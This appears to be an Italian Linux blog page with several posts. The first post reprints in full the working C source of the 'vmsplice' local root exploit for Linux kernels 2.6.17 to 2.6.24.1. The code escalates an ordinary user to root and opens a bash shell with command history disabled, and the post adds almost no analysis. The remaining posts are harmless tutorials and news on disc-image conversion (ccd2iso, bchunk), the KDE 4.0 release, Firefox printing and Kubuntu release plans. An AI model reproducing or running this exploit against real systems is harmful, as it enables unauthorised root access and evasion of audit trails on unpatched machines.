IppatsuBlog

Il kernel di Linux fino alla versione 2.6.24.1 è vulnerabile a un exploit locale che permette a un utente normale di ottenere i privilegi di root. Il codice dell’exploit è il seguente:

/*
 * Linux vmsplice Local Root Exploit
 * By qaaz
 *
 * Linux 2.6.17 - 2.6.24.1
 *
 * (compile fixed by nenolod.)
 */

#define _GNU_SOURCE
#include <stdio.h>
#include <errno.h>
#include <stdlib.h>
#include <string.h>
#include <malloc.h>
#include <limits.h>
#include <signal.h>
#include <unistd.h>
#include <sys/uio.h>
#include <sys/mman.h>
#include <asm/page.h>
#define __KERNEL__
#include <asm/unistd.h>

#define PIPE_BUFFERS	16
#define PG_compound	14
#define uint		unsigned int
#define static_inline	static inline __attribute__((always_inline))
#define STACK(x)	(x + sizeof(x) - 40)

struct page {
	unsigned long flags;
	int count;
	int mapcount;
	unsigned long private;
	void *mapping;
	unsigned long index;
	struct { long next, prev; } lru;
};

void	exit_code();
char	exit_stack[1024 * 1024];

void	die(char *msg, int err)
{
	printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err));
	fflush(stdout);
	fflush(stderr);
	exit(1);
}

#if defined (__i386__)

#ifndef __NR_vmsplice
#define __NR_vmsplice	316
#endif

#define USER_CS		0x73
#define USER_SS		0x7b
#define USER_FL		0x246

static_inline
void	exit_kernel()
{
	__asm__ __volatile__ (
	"movl %0, 0x10(%%esp) ;"
	"movl %1, 0x0c(%%esp) ;"
	"movl %2, 0x08(%%esp) ;"
	"movl %3, 0x04(%%esp) ;"
	"movl %4, 0x00(%%esp) ;"
	"iret"
	: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
	    "i" (USER_CS), "r" (exit_code)
	);
}

static_inline
void *	get_current()
{
	unsigned long curr;
	__asm__ __volatile__ (
	"movl %%esp, %%eax ;"
	"andl %1, %%eax ;"
	"movl (%%eax), %0"
	: "=r" (curr)
	: "i" (~8191)
	);
	return (void *) curr;
}

#elif defined (__x86_64__)

#ifndef __NR_vmsplice
#define __NR_vmsplice	278
#endif

#define USER_CS		0x23
#define USER_SS		0x2b
#define USER_FL		0x246

static_inline
void	exit_kernel()
{
	__asm__ __volatile__ (
	"swapgs ;"
	"movq %0, 0x20(%%rsp) ;"
	"movq %1, 0x18(%%rsp) ;"
	"movq %2, 0x10(%%rsp) ;"
	"movq %3, 0x08(%%rsp) ;"
	"movq %4, 0x00(%%rsp) ;"
	"iretq"
	: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
	    "i" (USER_CS), "r" (exit_code)
	);
}

static_inline
void *	get_current()
{
	unsigned long curr;
	__asm__ __volatile__ (
	"movq %%gs:(0), %0"
	: "=r" (curr)
	);
	return (void *) curr;
}

#else
#error "unsupported arch"
#endif

#if defined (_syscall4)
#define __NR__vmsplice	__NR_vmsplice
_syscall4(
	long, _vmsplice,
	int, fd,
	struct iovec *, iov,
	unsigned long, nr_segs,
	unsigned int, flags)

#else
#define _vmsplice(fd,io,nr,fl)	syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
#endif

static uint uid, gid;

void	kernel_code()
{
	int	i;
	uint	*p = get_current();

	for (i = 0; i < 1024-13; i++) {
		if (p[0] == uid && p[1] == uid &&
		    p[2] == uid && p[3] == uid &&
		    p[4] == gid && p[5] == gid &&
		    p[6] == gid && p[7] == gid) {
			p[0] = p[1] = p[2] = p[3] = 0;
			p[4] = p[5] = p[6] = p[7] = 0;
			p = (uint * ) ((char *)(p + 8 ) + sizeof(void *));
			p[0] = p[1] = p[2] = ~0;
			break;
		}
		p++;
	}	

	exit_kernel();
}

void	exit_code()
{
	if (getuid() != 0)
		die("wtf", 0);

	printf("[+] root\n");
	putenv("HISTFILE=/dev/null");
	execl("/bin/bash", "bash", "-i", NULL);
	die("/bin/bash", errno);
}

int	main(int argc, char *argv[])
{
	int		pi[2];
	size_t		map_size;
	char *		map_addr;
	struct iovec	iov;
	struct page *	pages[5];

	uid = getuid();
	gid = getgid();
	setresuid(uid, uid, uid);
	setresgid(gid, gid, gid);

	printf("-----------------------------------\n");
	printf(" Linux vmsplice Local Root Exploit\n");
	printf(" By qaaz\n");
	printf("-----------------------------------\n");

	if (!uid || !gid)
		die("!@#$", 0);

	/*****/
	pages[0] = *(void **) &(int[2]){0,PAGE_SIZE};
	pages[1] = pages[0] + 1;

	map_size = PAGE_SIZE;
	map_addr = mmap(pages[0], map_size, PROT_READ | PROT_WRITE,
	                MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
	if (map_addr == MAP_FAILED)
		die("mmap", errno);

	memset(map_addr, 0, map_size);
	printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
	printf("[+] page: 0x%lx\n", pages[0]);
	printf("[+] page: 0x%lx\n", pages[1]);

	pages[0]->flags    = 1 << PG_compound;
	pages[0]->private  = (unsigned long) pages[0];
	pages[0]->count    = 1;
	pages[1]->lru.next = (long) kernel_code;

	/*****/
	pages[2] = *(void **) pages[0];
	pages[3] = pages[2] + 1;

	map_size = PAGE_SIZE;
	map_addr = mmap(pages[2], map_size, PROT_READ | PROT_WRITE,
	                MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
	if (map_addr == MAP_FAILED)
		die("mmap", errno);

	memset(map_addr, 0, map_size);
	printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
	printf("[+] page: 0x%lx\n", pages[2]);
	printf("[+] page: 0x%lx\n", pages[3]);

	pages[2]->flags    = 1 << PG_compound;
	pages[2]->private  = (unsigned long) pages[2];
	pages[2]->count    = 1;
	pages[3]->lru.next = (long) kernel_code;

	/*****/
	pages[4] = *(void **) &(int[2]){PAGE_SIZE,0};
	map_size = PAGE_SIZE;
	map_addr = mmap(pages[4], map_size, PROT_READ | PROT_WRITE,
	                MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
	if (map_addr == MAP_FAILED)
		die("mmap", errno);
	memset(map_addr, 0, map_size);
	printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
	printf("[+] page: 0x%lx\n", pages[4]);

	/*****/
	map_size = (PIPE_BUFFERS * 3 + 2) * PAGE_SIZE;
	map_addr = mmap(NULL, map_size, PROT_READ | PROT_WRITE,
	                MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
	if (map_addr == MAP_FAILED)
		die("mmap", errno);

	memset(map_addr, 0, map_size);
	printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);

	/*****/
	map_size -= 2 * PAGE_SIZE;
	if (munmap(map_addr + map_size, PAGE_SIZE) < 0)
		die("munmap", errno);

	/*****/
	if (pipe(pi) < 0) die("pipe", errno);
	close(pi[0]);

	iov.iov_base = map_addr;
	iov.iov_len  = ULONG_MAX;

	signal(SIGPIPE, exit_code);
	_vmsplice(pi[1], &iov, 1, 0);
	die("vmsplice", errno);
	return 0;
}

// milw0rm.com [2008-02-09]

La prima versione non vulnerabile è la 2.6.24-git20, il che vuol dire che tutte le versioni di (K)Ubuntu sono vulnerabili, inclusa l’LTS 6.06 Dapper Drake e Gutsy Gibbon 7.10. Ci si aspetta a giorni un update che elimini questo pericoloso bug.

Non ho fatto in tempo a scrivere il post precedente quando è saltato fuori che l’immagine che dovevo montare non era .cue/.bin ma .ccd/.img/.sub , il formato utilizzato da CloneCD. Per convertire l’immagine in .iso ci viene in soccorso il programma ccd2iso, che potete scaricare da qui: http://downloads.sourceforge.net/ccd2iso/ccd2iso-0.3.tar.gz.

Installate il compilatore e le librerie eseguendo:

sudo aptitude install build-essential

Scompattate il file appena scaricato, eseguite il configure, compilatelo e installatelo:

tar xvf ccd2iso-0.3.tar.gz
cd ccd2iso-0.3
./configure
make
sudo make install

Adesso potrete usare il comand ccd2iso. Per convertire l’immagine image.img in .iso eseguite:

ccd2iso image.img image.iso

Dopo un po’ l’immagine image.iso sarà pronta, e potrete montarla (supponendo che la cartella /mnt/virtcd esista già):

sudo mount -t iso9660 -o loop image.iso /mount/virtcd

Oggi avevo bisogno di montare su Kubuntu l’immagine di un cd. Purtroppo l’immagine non era nel classico formato .iso, ma in formato .bin con allegato .cue. Non avendo voglia di installare cdemu o AcetoneISO, mi sono attrezzato per convertire l’immagine .bin/.cue in una più classica .iso. Il programma in questione è bchunk, un vecchio programma che fa ancora egregiamente il suo lavoro. Per installarlo (su Ubuntu, Kubuntu e tutte le derivate Debian) eseguite:

sudo aptitude install bchunk

per le altre distribuzioni (Mandriva, Fedora, Gentoo) usate i tool più opportuni (yum, emerge, …).
Supponendo di voler convertire i file image.bin e image.cue in image.iso, eseguite questo comando:

bchunk image.bin image.cue image.iso

e così verrà creata l’immagine iso equivalente. Per montare l’immagine ad esempio nella cartella /mount/virtcd (che deve già esistere) eseguite:

sudo mount -t iso9660 -o loop image.iso /mount/virtcd

L’iso sarà montata e utilizzabile come una normale cartella.

Al Google Campus di Mountain View in California si sta svolgendo in queste ore il release event di KDE 4.0.
Particolarmente interessante è la presentazione di Aaron Seigo, benevolente dittatore di KDE, dove vengono presentate le tecnologie e i framework che costituiscono la struttura fondante di KDE 4 e ne permetterano, si spera, un ottimo sviluppo. Il ciclo di vita di KDE 4 è previsto essere lungo come quello di KDE 2 e KDE 3 sommati, per cui è prioritario avere delle solide basi che permettano a KDE di evolvere in modo robusto nel tempo. I componenti presentati sono:

Oxygen

Non si tratta propriamente di una tecnologia, ma è l’appeal grafico di KDE. Il progetto Oxygen si è occupato di ridisegnare completamente le icone di KDE (alcune migliaia), ridisegnare il look & feel delle finestre e di creare un nuovo tema di suoni per KDE 4.

È ciò che dovrebbe attirare frotte di sviluppatori su KDE 4 È un layer trasparente che permette di accedere alle funzionalità di KDE e delle applicazioni che lo supportanto con qualunque linguaggio di scripting. Attualmente sono supportati “out of the box” ruby, python e javascript. Sono in corso i lavori su krossjava, che permetterà anche l’utilizzo di Java. Se ad esempio una azienda usa molto python e KOffice è possibile esportare degli oggetti da un documento di KOffice e manipolarli in python.

La presentazione di Seigo è continua con un piccolo demo del funzionamento Dolphin, il nuovo file manager e il funzionamento di base di KDE su Mac.

Seigo ha anche descritto le nuove possibilità che si aprono per KDE grazie al supporto per più sistemi operativi: da un lato sicuramente attirare più utenti e sviluppatori grazie alla possibilità di sviluppare facilmente programmi non platform dependent, dall’altro quello ad esempio di standardizzare il supporto tecnico nelle aziende. Seigo spiega come sia possibile per una azienda scegliere di supportare Kontact come applicazione per le email, scegliere un server che supporti un qualunque protocollo aperto (non Exchange) e lasciare scelta agli utenti della piattaforma su cui utilizzarlo (Linux, Windows, BSD, Mac, OpenSolaris).

Infine viene presentata la comodità di utilizzare SVG per rappresentare la grafica in modo indipendente dalla risoluzione e una piccola demo di Marble, un componente simile a Google Earth, che in futuro userà il progetto Open Street Map per rappresentare le strade.

KDE 4 si presenta con un insieme di framework portabili e flessibili, sta ora agli sviluppatori e agli utenti trovare modi per farli interagire in modo utile. Il messaggio che ha cercato di veicolare Aaron Seigo è il secondo motto di KDE 4 (il primo è “Be free”): “the start of something amazing”. KDE 4 probabilmente non è ancora maturo, ma è la piattaforma su cui ci saranno, si spera, grandi sviluppi.

KDE4 è stato rilasciato. L’obiettivo più o meno tacito è quello di attirare sviluppatori e utenti sulla nuova piattaforma, oltre a quello di testare le nuove tecnologie (Plasma, Phono, Solid, Nepomuk, Strigi, Soprano, Decibel, Kross, ThreadWeaver). L’aspetto più evidente di KDE4, Plasma, è stato oggetto a un buon numero di segnalazioni di bug. In un suo post randomguy3, uno degli sviluppatori di KDE, ha indicato i bug segnalati più di frequente:

• L’immagine di sfondo non sempre viene caricata. Il fix sarà rilasciato con la versione 4.0.1.
• Gli handle delle applet non sempre sparisco quando il mouse viene spostato via dalla stessa. Il fix (”quasi perfetto”) è atteso per la versione 4.0.1.
• Nessuna configurazione per la taskbar (randomguy3 commenta con “is coming”).
• In alcuni casi il crash del desktop può portare a un salvataggio solo parziale della configurazione, lasciandolo senza barra degli strumenti.

Per quanto io ami KDE non posso onestamente dire che sia davvero pronto per chi voglia utilizzarlo come Desktop Environment permanente. Per chi sia meno inclinato al bleeding edge e preferisca la stabilità e la personabilizzabilità, suggerisco caldamente di attendere almeno KDE 4.1 e nel frattempo continuare tranquillamente a usare KDE 3.5.

E visto che tutti lo stanno facendo:

Su Linux Firefox utilizza una sua finestra di dialogo per la stampa delle pagine web, che può essere un po’ limitativa. È abbastanza facile però convicerlo a utilizzare il sistema di stampa di KDE. Per farlo eseguite queste operazioni:

1. Nella barra degli indirizzi di Firefox digitate about:config e premete invio
2. Cliccate con il tasto destro su una riga qualunque e scegliete New->String
3. Nella prima finestra di dialogo che comparirà selezionate inserite print.printer_PostScript/default.print_command (esattamente come indicato qui, maiuscole e minuscole sono importanti!) e cliccate su Ok
4. Nella seconda finestra di dialogo che apparirà inserite kprinter e cliccate su Ok
5. Chiudete la linguetta di about:config

Adesso quando vorrete stampare qualcosa da Firefox nella vecchia finestra di dialogo selezionate PostScript/default e si avvierà il sistema di stampa di KDE, dove potrete usare normalmente la vostra stampante (o anche le stampanti virtuali che vi permettono di inviare la pagina come allegato pdf via mail, inviarla via fax e così via).

Non sono un fanatico degli effetti composite portati alla ribalta da Compiz/Beryl/Compiz fusion, ma sono del parere che un po’ di “eye candy” per attirare utenti non guasti (purché siano consci che spesso questi effetti sono causa di impantanamenti del desktop environment).

Il gestore delle finestre di KDE 4, KWin, ha dei propri effetti grafici integrati, attivabili se il server X (AiGLX, XGL) supporta il composite. Ecco un video in attesa che KDE 4 venga rilasciato:

Come riportato dal blog di nixternal, Kubuntu 8.04 includerà l’atteso KDE 4 e non sarà una versione LTS (Long Time Support), vale a dire che riceverà aggiornamenti per 18 mesi, invece dei canonici 36 assegnati alle release LTS versione desktop (60 mesi per la versione server).

La decisione, ufficializzata da una email di Jonathan Riddel sulla mailing list degli sviluppatori di Kubuntu, è stata piuttosto sofferta, ma ha le sue motivazioni.

Il team di sviluppo di KDE si sta ormai concentrando sulla release 4, e la serie 3.x riceverà sempre meno attenzioni. Una LTS vuol dire fornire 3 anni di aggiornamenti, il che obbligherà gli sviluppatori di Kubuntu a effettuare il backporting di eventuali patch critiche sulla serie 3.x, mantenendo così un sistema che utilizza una versione obsoleta di KDE.

A ciò si aggiunge che molte altre distribuzioni proporrano KDE 4 come desktop environment di default, allontanando così gli utenti che vorrebbero essere “on the bleeding edge”.

Lo scenario più probabile è che verranno rilasciate due versioni di Kubuntu 8.04 Hardy Heron: una LTS con KDE 3.5 e una non-LTS con KDE 4.

Leggendo il blog di nixternal ho scoperto questa giocattolo: weather-wallpaper, un programma scritto in python che cambia automaticamente lo sfondo del desktop per riflettere le condizioni metereologiche attuali. Le istruzioni sul suo sito sono molto chiare, e è possibile scaricare semplicemente il .deb per l’installazione oppure aggiungere il repository dell’autore al proprio sources.list per ricevere automaticamente gli aggiornamenti. Anche se il repository è indicato per Feisty non ho avuto alcun problema nell’installarlo su Kubuntu Gutsy Gibbon 7.10.

Funziona sia su gnome che su KDE, ma ha delle dipendenze da gtk, per cui potrebbe essere non desideratissimo su sistemi che usano KDE come desktop environment e non vogliono “sporcarlo” con applicazioni che non usino solo QT.

Dopo averlo installato e avviato lo si configura indicandogli l’indentificatore ICAO della stazione metereologica più vicina alla città di cui vi interessa il tempo (trovate la lista delle stazioni per l’Italia all’indirizzo http://weather.noaa.gov/cgi-bin/nsd_country_lookup.pl?country=Italy) e lo sfondo verrà automaticamente aggiornato ogni ora.

Ecco un esempio di weather-wallpaper in azione:

weather-wallpaper: http://mundogeek.net/weather-wallpaper/

Il “Kubuntu tutorials day” si è tenuto con successo il 13 Dicembre. Per chi non ha potuto parteciparvi (come me ) sono disponibili i log all’indirizzo https://wiki.kubuntu.org/KubuntuTutorialsDay.

Il primo tutorial, tenuto dal deus ex machina di Kubuntu Jonathan Riddel, ha affrontato le basi della programmazione di KDE4 con python utilizzando PyKDE 4. Onestamente non ci si riesce a capire molto (e è completamente cinese se non si ha già una infarinatura di base di programmazione con Python e QT). Sostanzialmente jriddel ripercorre le slide che potete scaricare a questo indirizzo (pdf) in modo caotico a causa delle continue interruzioni. Un vero peccato.

Interessante per gli sviluppatori (o almeno per me) è stata la presentazione di Bazaar Version Control, un sistema per la gestione delle modifiche concorrenti a un progetto che supporta diversi workflow rispetto a quelli tradizionalmente supportati da CVS e Subversion, la pagina http://bazaar-vcs.org/Workflows dà una buona panoramica delle diverse modalità di funzionamento disponibili.

Anche la sessione di “Packaging 101″ e “Get your work into Kubuntu” sono state interessanti, oltre a mostrare uno spaccato della comunità che è alle basi di (K)Ubuntu e al suo processo di sviluppo.

La mia personalissima conclusione è che le sessioni su IRC vanno bene per “fare pubblicità”, ma non possono in alcun modo “formare” o insegnare qualcosa che rimanga. Per questo per chi è interessato agli argomenti trattati è bene far riferimento alle pagine del wiki o ai link suggeriti dai tutor delle sessioni:

• PyKDE 4: http://techbase.kde.org/Development/Tutorials/Python_introduction_to_signals_and_slots
• Packaging di .deb: https://wiki.kubuntu.org/PackagingGuide e le pagine linkate
• Rendere il proprio lavoro disponibile a tutta la comunità di *ubuntu sui repository universe e multiverse: https://wiki.kubuntu.org/MOTU/GettingStarted
• Bazaar Version Control:
  • http://bazaar-vcs.org/Workflows
  • http://doc.bazaar-vcs.org/latest/en/mini-tutorial/index.html
  • http://bazaar-vcs.org/BzrForeignBranches/